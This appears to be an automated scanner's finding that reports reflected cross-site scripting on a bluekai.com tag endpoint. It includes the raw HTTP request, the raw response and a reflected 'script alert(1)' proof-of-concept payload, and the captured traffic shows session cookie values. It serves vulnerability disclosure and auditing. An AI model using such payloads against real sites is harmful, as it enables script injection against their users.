1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://tags.bluekai.com |
Path: | /site/2834 |
GET /site/2834?ret=js&phint=_ Accept: */* Referer: http://news.cnet.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: tags.bluekai.com Proxy-Connection: Keep-Alive Cookie: bk=+tmRkzV5c/cyzSCn; bkc=KJyETZjQzmhARJeA |
HTTP/1.0 200 OK Date: Sun, 07 Nov 2010 22:06:29 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: max-age=0, no-cache, no-store Set-Cookie: bk=m7Eo9XV5c/cyzSCn; expires=Fri, 06-May-2011 22:06:29 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJyETZjQzmhARJeA Set-Cookie: bkdc=chi; expires=Mon, 08-Nov-2010 22:06:29 GMT; path=/; domain=.bluekai.com BK-Server: e7eb Content-Length: 79 Content-Type: text/javascript Connection: keep-alive cbsiPrepBK411bc<script>alert(1)< { "campaigns": [ ] } ); |